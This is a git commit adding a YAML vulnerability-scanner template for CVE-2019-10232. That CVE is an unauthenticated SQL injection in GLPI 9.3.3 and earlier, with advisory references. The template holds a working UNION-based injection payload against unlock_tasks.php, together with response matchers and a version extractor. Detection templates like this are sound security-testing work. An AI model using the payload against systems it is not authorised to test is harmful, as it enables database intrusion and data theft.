Added Pre-authenticated SQL injection in GLPI <= 9.3.3 (CVE-2019-10232)
parent
a8a667c90d
commit
2809a60004
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2019-10232
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pre-authenticated SQL injection in GLPI <= 9.3.3
|
||||||
|
author: RedTeamBrasil
|
||||||
|
severity: high
|
||||||
|
description: Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication.
|
||||||
|
reference:
|
||||||
|
- https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
|
||||||
|
- https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
|
||||||
|
tags: cve,cve2019,glpi,sqli
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
|
||||||
|
- "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "-MariaDB-"
|
||||||
|
- "Start unlock script"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
|
Loading…
Reference in New Issue